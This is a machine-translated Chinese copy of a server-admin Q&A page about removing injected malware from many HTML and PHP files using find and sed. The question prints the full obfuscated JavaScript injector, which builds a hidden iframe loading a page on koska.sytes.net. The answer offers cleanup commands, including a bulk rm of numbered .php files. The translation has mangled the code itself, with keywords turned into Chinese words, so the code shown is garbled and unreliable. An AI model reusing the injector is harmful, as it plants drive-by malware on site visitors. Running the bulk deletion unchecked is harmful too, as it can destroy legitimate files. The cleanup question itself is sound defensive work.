服务器 Gind.cn
  1. 服务器 Gind.cn
  3. 我怎样才能删除sed多个文件中的恶意代码?
Intereting Posts
如何自动删除Etrust Antivirus? GeoIP和Nginx 如何使用Strawberry Perl在Windows上运行Bugzilla? 强大的文件复制工具 澄清清漆caching jenkins奴隶失败握手在窗口 glusterfs 3.2.5传输端点未连接 puppet:nagios主机文件不断有重复添加 Postfix与Spamassassin,放弃垃圾邮件,而不是传递到垃圾邮件文件夹 我可以通过YUM存储库更新MySQL,而不会丢失数据/损坏吗? 我应该紧张吗? Rackspace Linux服务器崩溃 在WordPress的pipe理页面的Apache段错误 在Apache Web服务器中筛选 在日志中计算带有间隔的新行的数量 沉睡Apache服务器拒绝连接,但不通过本地主机

我怎样才能删除sed多个文件中的恶意代码?

我在服务器上的这么多.html和.php文件中有这个恶意代码。 我需要删除他们使用

  • sed -i expression
  • search目录下的所有文件/home/
  • find感染的文件

  • 通过将其replace为空白来删除代码

    VAR usikwseoomg = 'PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66'; VAR nimbchnzujc = 'PaBUTyjaZYg72'; VAR szwtgmqzekr = 'PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22'; VAR yvofadunjkv = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76'; VAR ylydzxyjaci = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22'; VAR xwojmnoxfbs = 'PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22'; VAR mgsybgilcfx = 'PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f';无功nixyhgyjouf ='koska.sytes.net/phl/logs/index.php';var nesrtqwuirb = 'PaBUTyjaZYg'; VAR rqchyojemkn = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76'; VAR niupgeebkhf = 'PaBUTyjaZYg'; VAR yyzsvtbnudd = 'PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66'; VAR tlclvgxfthn = 'PaBUTyjaZYg72PaBUTyjaZYg61'; VAR zxttbudjafh = 'PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e'; VAR yydszqnduko =新的Array(); yydszqnduko [0 ] =新arrays(usikwseoomg + nimbchnzujc + szwtgmqzekr + yvofadunjkv + ylydzxyjaci + xwojmnoxfbs + mgsybgilcfx + nixyhgyjouf + nesrtqwuirb + rqchyojemkn + niupgeebkhf + yyzsvtbnudd + tlclvgxfthn + zxttbudjafh);文件[ 'PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace(/ PaBUTyjaZYg /克,'') ](窗口[ 'PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace(/ PaBUTyjaZYg /克,' ')](yydszqnduko.toString()代替(/ PaBUTyjaZYg / g时,' %“))。);

我认为这可以做到这一点: 

 find /home \( -name "*.html" -o -name "*.php" \) -exec sed -i.bak 's/<script.*PaBUTyjaZYg.*script>//g' \{\} \;

从评论“删除所有文件中有名字和扩展名为.php的数字” 

 find /home -name "*[0-9]*.php" -exec rm \{\} \;

但首先,使用echo而不是rm来运行它,以确保不会删除不想删除的内容。

我会说一个更好/更安全的解决scheme是从干净的备份恢复这些文件。